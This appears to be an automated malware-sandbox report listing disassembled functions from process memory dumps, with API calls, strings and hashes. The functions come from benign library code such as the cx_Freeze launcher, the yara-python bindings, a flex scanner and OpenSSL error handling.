Opcode ID: 53cda655a70ce6b173b254eb92ede109c19d3a134826502f5468e12369e5443e
Instruction ID: cd5ff1327311315851c5698f5b2b3c3c757b64f4123f8b9ddf50b9ad6d7fa3a9
Opcode Fuzzy Hash: 53cda655a70ce6b173b254eb92ede109c19d3a134826502f5468e12369e5443e
Instruction Fuzzy Hash: B161A2B6A003059BC710DF69EC8495AB7A8FF88655B444E19FE4D83300D731EE69CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 114windowCOMMON

Download Yara Rule

APIs

PyErr_Fetch.PYTHON27(?,?,?), ref: 004011C5
PyErr_NormalizeException.PYTHON27(?,?,?), ref: 004011DA
PyObject_GetAttrString.PYTHON27(?,caption), ref: 004011F0
PyErr_Clear.PYTHON27 ref: 0040120D
PyString_FromString.PYTHON27(cx_Freeze: Application Terminated), ref: 00401214
MessageBoxA.USER32 ref: 00401230
Py_Finalize.PYTHON27 ref: 00401236
PyObject_GetAttrString.PYTHON27(?,code), ref: 00401250
PyErr_Clear.PYTHON27 ref: 0040125F
Py_Exit.PYTHON27(00000000), ref: 00401271
PyInt_AsLong.PYTHON27(00000000), ref: 00401287
Py_Exit.PYTHON27(00000000), ref: 00401291
PyObject_Str.PYTHON27(00000000), ref: 004012A0
MessageBoxA.USER32 ref: 004012BA
Py_Finalize.PYTHON27 ref: 004012C0
MessageBoxA.USER32 ref: 004012DA
Py_Exit.PYTHON27(00000001), ref: 004012E6

Strings

caption, xrefs: 004011EA
Cannot get string representation of messsage., xrefs: 004012B4
code, xrefs: 0040124A
cx_Freeze: Application Terminated, xrefs: 0040120F
Cannot create caption string object., xrefs: 0040122A
cx_Freeze Fatal Error, xrefs: 00401225, 004012AF

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_$ExitMessageObject_String$AttrClearFinalize$ExceptionFetchFromInt_LongNormalizeString_
String ID: Cannot create caption string object.$Cannot get string representation of messsage.$caption$code$cx_Freeze Fatal Error$cx_Freeze: Application Terminated
API String ID: 2893208991-2433880048
Opcode ID: 89df755a1a498ab7a70dadb095bc525f6b11bdb1686e727c506d68ceec1e7ec7
Instruction ID: 2e4405523eca4825c9bb84557d9276cd596f9828258ac014b4a338fd049a4a59
Opcode Fuzzy Hash: 89df755a1a498ab7a70dadb095bc525f6b11bdb1686e727c506d68ceec1e7ec7
Instruction Fuzzy Hash: 04314E715003009BC210DB68EE8DB9B3798AF84735F14463AFE55F62D0D6B8E50DCABA

Uniqueness

Uniqueness Score: -1.00%

Function 00401060, Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 114windowCOMMON

Download Yara Rule

APIs

PyErr_Fetch.PYTHON27(?,?,?), ref: 00401074
PyErr_NormalizeException.PYTHON27(?,?,?), ref: 00401089
PyString_FromString.PYTHON27(?), ref: 0040109A
MessageBoxA.USER32 ref: 004010B2
Py_Finalize.PYTHON27 ref: 004010B8
PyString_FromString.PYTHON27(%sException: %sOriginal Exception: %s), ref: 004010CD
MessageBoxA.USER32 ref: 0040115F
Py_Finalize.PYTHON27 ref: 00401165

Strings

%sException: %sOriginal Exception: %s, xrefs: 004010C8
Cannot create context message string object., xrefs: 004010AC
Cannot create format args tuple., xrefs: 004010FC
Cannot create format string object., xrefs: 004010DF
Cannot create caption string object., xrefs: 00401183
Cannot format exception values., xrefs: 00401158
cx_Freeze Fatal Error, xrefs: 004010A7, 004010DA, 004010F7, 00401153
cx_Freeze: Python error in main script (traceback unavailable), xrefs: 00401175

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_FinalizeFromMessageStringString_$ExceptionFetchNormalize
String ID: %sException: %sOriginal Exception: %s$Cannot create caption string object.$Cannot create context message string object.$Cannot create format args tuple.$Cannot create format string object.$Cannot format exception values.$cx_Freeze Fatal Error$cx_Freeze: Python error in main script (traceback unavailable)
API String ID: 3095192351-4153315938
Opcode ID: f0c9216ad23d9cc166efd4f723f753248eaf4627770925fe2504169ab71f2ef0
Instruction ID: 68f5a6808b03b87169f10ae24a04d0bda4a67932a510e3fffa867c6664ff27de
Opcode Fuzzy Hash: f0c9216ad23d9cc166efd4f723f753248eaf4627770925fe2504169ab71f2ef0
Instruction Fuzzy Hash: 66313B71240300ABC3149F54AE4ABA63768FB48716F10453BFF417A3E1D7B9A618C69E

Uniqueness

Uniqueness Score: -1.00%

Function 02C40BF0, Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 276COMMON

Download Yara Rule

APIs

Part of subcall function 02C40370: longjmp.MSVCR90(00000000,00000001,out of dynamic memory in yyensure_buffer_stack()), ref: 02C40380

realloc.MSVCR90 ref: 02C40CA3
getc.MSVCR90(0000000A,?,?,?,02C41109), ref: 02C40D04
ferror.MSVCR90 ref: 02C40D4D
_errno.MSVCR90 ref: 02C40DAF
fread.MSVCR90 ref: 02C40DCD
ferror.MSVCR90 ref: 02C40DE4
_errno.MSVCR90 ref: 02C40DF1
_errno.MSVCR90 ref: 02C40DF8
clearerr.MSVCR90 ref: 02C40E04
fread.MSVCR90 ref: 02C40E20
realloc.MSVCR90 ref: 02C40E76

Strings

out of dynamic memory in yy_get_next_buffer(), xrefs: 02C40E9A
input in flex scanner failed, xrefs: 02C40D5A
fatal flex scanner internal error--end of buffer missed, xrefs: 02C40C11
input in flex scanner failed, xrefs: 02C40E35
fatal error - scanner input buffer overflow, xrefs: 02C40D65

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$ferrorfreadrealloc$clearerrgetclongjmp
String ID: fatal error - scanner input buffer overflow$fatal flex scanner internal error--end of buffer missed$input in flex scanner failed$input in flex scanner failed$out of dynamic memory in yy_get_next_buffer()
API String ID: 2184337531-1071088737
Opcode ID: 0c5e9d56d23a5cc53a4be9db7135cc0d9a784c1c3c97a358d9c64e9373597f91
Instruction ID: e4422afb283cdb566abef9fa51f6fb82b0891d8ed2a94c841d032441db27da39
Opcode Fuzzy Hash: 0c5e9d56d23a5cc53a4be9db7135cc0d9a784c1c3c97a358d9c64e9373597f91
Instruction Fuzzy Hash: EEB16E74640A05CFC728DF58C980A27B7F2EF85714B14CA5DDA568B742DB31FA1ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C33C90, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02C33CAB
printf.MSVCR90 ref: 02C33CDA
printf.MSVCR90 ref: 02C33CF5
printf.MSVCR90 ref: 02C33D0A
printf.MSVCR90 ref: 02C33D25
printf.MSVCR90 ref: 02C33D38
printf.MSVCR90 ref: 02C33D61
printf.MSVCR90 ref: 02C33D7C
printf.MSVCR90 ref: 02C33DA4
printf.MSVCR90 ref: 02C33DB8
printf.MSVCR90 ref: 02C33DE1
printf.MSVCR90 ref: 02C33DEE
printf.MSVCR90 ref: 02C33E03

Strings

%02x , xrefs: 02C33D5C
%s = , xrefs: 02C33D20
%p childs:%d depth:%d failure:%p, xrefs: 02C33CD5

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02x $%p childs:%d depth:%d failure:%p$%s =
API String ID: 3524737521-1131531689
Opcode ID: 6f2ca1c6d66915ea6725585da35a7736e3dc13b7589bc962e5a72f1d6365eb65
Instruction ID: e5e7e61f69fa0ce7b7c04786dc0f9196e9fe9abfd196a2b2b0c9c02a895ef69a
Opcode Fuzzy Hash: 6f2ca1c6d66915ea6725585da35a7736e3dc13b7589bc962e5a72f1d6365eb65
Instruction Fuzzy Hash: 434149707002945BF7168B59EC91E7A379AAFC1508F1544A6FC8B8B301DE60FE598BE2

Uniqueness

Uniqueness Score: -1.00%

Function 02C31250, Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 70COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02999790,could not open file "%s",?), ref: 02C3129C
PyErr_Format.PYTHON27(02999790,could not map file "%s" into memory,?), ref: 02C312B7
PyErr_Format.PYTHON27(02999790,invalid rules file "%s",?), ref: 02C312D2
PyErr_Format.PYTHON27(02999790,corrupt rules file "%s",?), ref: 02C312EC
PyErr_Format.PYTHON27(02999790,external variable "%s" was already defined with a different type,?), ref: 02C3131E
PyErr_Format.PYTHON27(02999790,rules file "%s" is incompatible with this version of YARA,?), ref: 02C31339
PyErr_Format.PYTHON27(02999790,internal error: %d), ref: 02C3134F

Strings

external variable "%s" was already defined with a different type, xrefs: 02C31318
could not open file "%s", xrefs: 02C31296
access denied, xrefs: 02C3126E, 02C31295
internal error: %d, xrefs: 02C31349
invalid rules file "%s", xrefs: 02C312CC
corrupt rules file "%s", xrefs: 02C312E6
rules file "%s" is incompatible with this version of YARA, xrefs: 02C31333
scanning timed out, xrefs: 02C312F6, 02C31317
could not map file "%s" into memory, xrefs: 02C312B1

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: access denied$corrupt rules file "%s"$could not map file "%s" into memory$could not open file "%s"$external variable "%s" was already defined with a different type$internal error: %d$invalid rules file "%s"$rules file "%s" is incompatible with this version of YARA$scanning timed out
API String ID: 376477240-1552458549
Opcode ID: 13414653f2d98c9e7427fed59fd7eb3a3a47a281648f060ec6f90d34d2fa0c56
Instruction ID: 38da713903ab5a350eaf52d11ea95404ed0295318ca8c9374e0d7d4feb7e0a35
Opcode Fuzzy Hash: 13414653f2d98c9e7427fed59fd7eb3a3a47a281648f060ec6f90d34d2fa0c56
Instruction Fuzzy Hash: 70212C75A88301EFD740CF20F845D3A37B5BB88685B884989F58E83340C6709E38CA05

Uniqueness

Uniqueness Score: -1.00%

Function 02C31A10, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

PyErr_SetNone.PYTHON27(?), ref: 02C31A34
PyObject_Malloc.PYTHON27(00000014,02D45310), ref: 02C31A53
PyObject_Init.PYTHON27(00000000), ref: 02C31A5D
PyList_New.PYTHON27(00000000), ref: 02C31A6B
PyDict_New.PYTHON27 ref: 02C31A7A
PyString_FromString.PYTHON27(?), ref: 02C31AB7
PyList_Append.PYTHON27(00000000,00000000), ref: 02C31AC1
_Py_BuildValue_SizeT.PYTHON27(02D45778,?,?), ref: 02C31B2C
PyDict_SetItemString.PYTHON27(?,?,00000000), ref: 02C31B5D

Strings

Out of memory, xrefs: 02C31BE8

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_List_Object_String$AppendBuildErr_FromInitItemMallocNoneSizeString_Value_
String ID: Out of memory
API String ID: 1441624211-696950042
Opcode ID: 48c14a546b61ac5fb7c2d1c24e4204616278d305a2215221000b3b5bef72969a
Instruction ID: 269b38a525d93e2480e144496c7c3f61e05b768f3a0034d3d04bea8c05dddf9d
Opcode Fuzzy Hash: 48c14a546b61ac5fb7c2d1c24e4204616278d305a2215221000b3b5bef72969a
Instruction Fuzzy Hash: 0D51C6B5A403048FC711CF18E884AA673A4FF84768F184B19ED5D87341E775EA1ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C79770, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 157registryfilewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4), ref: 02C7978C
GetFileType.KERNEL32(00000000), ref: 02C79799
_vsnprintf.MSVCR90 ref: 02C797B7
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C797DA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C7981C
_vsnwprintf.MSVCR90 ref: 02C798B0
GetVersion.KERNEL32 ref: 02C798BE
RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 02C798DB
ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C79909
DeregisterEventSource.ADVAPI32(00000000), ref: 02C79910
MessageBoxW.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 02C79928

Strings

no stack?, xrefs: 02C7980A
OpenSSL, xrefs: 02C798D4
OpenSSL: FATAL, xrefs: 02C7991A

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWrite_vsnprintf_vsnwprintf
String ID: OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 3866500927-278800372
Opcode ID: ab36a9addbb929c53b643053c4c4b965406ba4b554de1df687a63be460ce6657
Instruction ID: 710b1bdccc661b583578db5ca1fac7e79873be10b431c836f9e0ecce52241bdd
Opcode Fuzzy Hash: ab36a9addbb929c53b643053c4c4b965406ba4b554de1df687a63be460ce6657
Instruction Fuzzy Hash: 3F514931A40315ABE720DF60CC89FAB7779EF84710F008959EA5A9B2D0EB709B05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C31E40, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02C31E58
PyString_FromString.PYTHON27(?), ref: 02C31E71
PyString_FromString.PYTHON27(?), ref: 02C31E8C
PyString_FromString.PYTHON27(?), ref: 02C31EA7
PyErr_Fetch.PYTHON27(?,?,?), ref: 02C31EC7
PyObject_CallFunctionObjArgs.PYTHON27(?,6E56FB3D,6E56FB3D,6E56FB3D,00000000), ref: 02C31ED6
PyErr_Restore.PYTHON27(?,?,?), ref: 02C31EED
PyString_AsString.PYTHON27(00000000), ref: 02C31F44
_strdup.MSVCR90(00000000), ref: 02C31F4B
PyErr_Occurred.PYTHON27 ref: 02C31F57
PyErr_Format.PYTHON27(00000000,'include_callback' function must return a yara rules as an ascii or unicode string), ref: 02C31F6F
PyGILState_Release.PYTHON27(?), ref: 02C31F92

Strings

'include_callback' function must return a yara rules as an ascii or unicode string, xrefs: 02C31F69

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_StringString_$From$State_$ArgsCallEnsureFetchFormatFunctionObject_OccurredReleaseRestore_strdup
String ID: 'include_callback' function must return a yara rules as an ascii or unicode string
API String ID: 901655891-1855780161
Opcode ID: 9c909cfb60f7798e31928af3a93a22f1ef1c10a87d1e946d5dfc8b26f477c33e
Instruction ID: acdc00f50bcc29b83033a1cb4dff95edf4d2e6d52b0db172019ac5042d1a6f64
Opcode Fuzzy Hash: 9c909cfb60f7798e31928af3a93a22f1ef1c10a87d1e946d5dfc8b26f477c33e
Instruction Fuzzy Hash: CA41B5B1A04345AFC700DF64D88499B77F8BF88264B094E2DFA5EC7240D775EA19CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02CF09E0, Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 276stringCOMMON

Download Yara Rule

APIs

strtoul.MSVCR90 ref: 02CF0AB3
strtoul.MSVCR90 ref: 02CF0B4B

Strings

min, xrefs: 02CF0A73
max, xrefs: 02CF0B11
, value=, xrefs: 02CF0AFA, 02CF0CE6
nomask, xrefs: 02CF0C00
mask, xrefs: 02CF0B69
..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c, xrefs: 02CF0AD2, 02CF0CB1
field=, xrefs: 02CF0B00
name=, xrefs: 02CF0CEC
flags, xrefs: 02CF0BC2
none, xrefs: 02CF0C35

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: strtoul
String ID: , value=$..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c$field=$flags$mask$max$min$name=$nomask$none
API String ID: 3805803174-245016966
Opcode ID: cd2a16edd7d1035fd80a466fe13b98c7d202edab4bcf55f8130a21bbfb642266
Instruction ID: 871293fe341786cb1642275777043ca2362e8570f59ad660561acc95a878e4f7
Opcode Fuzzy Hash: cd2a16edd7d1035fd80a466fe13b98c7d202edab4bcf55f8130a21bbfb642266
Instruction Fuzzy Hash: 4D9128616083415BDBE08F349CD1B777B969FC1A18F484598EA869B387F323DA0DC792

Uniqueness

Uniqueness Score: -1.00%

Function 02C31C00, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02C31C31
PyEval_SaveThread.PYTHON27(?,?,?,?,?,?,?,?), ref: 02C31C4A
PyEval_RestoreThread.PYTHON27(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02C31C67

Strings

|sO, xrefs: 02C31C1A
load() expects either a file path or a file-like object, xrefs: 02C31D0A
<file-like-object>, xrefs: 02C31CDD
write, xrefs: 02C31C90

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Thread$Arg_Keywords_ParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$write$|sO
API String ID: 2135743336-3765213004
Opcode ID: 48fe4b95c249a9f4fec649ca13fa7bff9b073d915343fe5266343fa0d63c5f1c
Instruction ID: 958006935306c008bbeb5cd78f6a64771ccafd2b3f18adfd224fd99b1d5358b7
Opcode Fuzzy Hash: 48fe4b95c249a9f4fec649ca13fa7bff9b073d915343fe5266343fa0d63c5f1c
Instruction Fuzzy Hash: 0F31A475A002049FD205EB18E845A9BB3E8BFC4755F894E19F84D83301E774DB288BA6

Uniqueness

Uniqueness Score: -1.00%

Function 02C31520, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02C31547
PyString_AsString.PYTHON27(?,?), ref: 02C31565
PyObject_IsTrue.PYTHON27(?), ref: 02C31580
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02C315AD
PyString_AsString.PYTHON27(?), ref: 02C315CF
PyDict_Next.PYTHON27(?,?,?,?), ref: 02C31636
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02C3165E

Strings

external values must be of type integer, float, boolean or string, xrefs: 02C31658

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: 469e2ce88a4732a8f92eb776288e94db30bf9a04574bebb14b1726fd9d401f13
Instruction ID: 421ac58b7f5c82997c085b29ea84f1ecbdd0ddb1cde4b82104fa2bcb67b5915c
Opcode Fuzzy Hash: 469e2ce88a4732a8f92eb776288e94db30bf9a04574bebb14b1726fd9d401f13
Instruction Fuzzy Hash: 3141A7B2A042046FD751DB68EC44EAB77BCEBC5655F484D1AF90DC2101E731DA28CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 02C313C0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02C313E7
PyString_AsString.PYTHON27(?,?), ref: 02C3140B
PyObject_IsTrue.PYTHON27(?), ref: 02C31422
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02C31450
PyString_AsString.PYTHON27(?), ref: 02C3146E
PyDict_Next.PYTHON27(?,?,?,?), ref: 02C314CC
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02C314F3

Strings

external values must be of type integer, float, boolean or string, xrefs: 02C314ED

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: 3004e078cd293d7670f2874b45dbf1bf2a237c3e0b032b8985460818c7671718
Instruction ID: c71efacbcb622ea876e479fb18f45045616e2084f9dfd9873ad999557ae51901
Opcode Fuzzy Hash: 3004e078cd293d7670f2874b45dbf1bf2a237c3e0b032b8985460818c7671718
Instruction Fuzzy Hash: 8D31A7B1A002046FD751DB59EC44FAB77ACEBC5665F088E1AF90DC3201E671DA248BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02CA82D0, Relevance: 16.7, APIs: 11, Instructions: 155fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02C89F33,?,00000001,00000000,?), ref: 02CA8326
GetLastError.KERNEL32(?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?,02D1B7D4,?,02C9FCF2,?,00000002,?), ref: 02CA832E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?), ref: 02CA8352
GetLastError.KERNEL32(?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?,02D1B7D4,?,02C9FCF2,?,00000002,?), ref: 02CA835A
fopen.MSVCR90 ref: 02CA8373
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,02C89F33,?,00000001,00000000,?,?,?,02C9FC93,?), ref: 02CA83AC
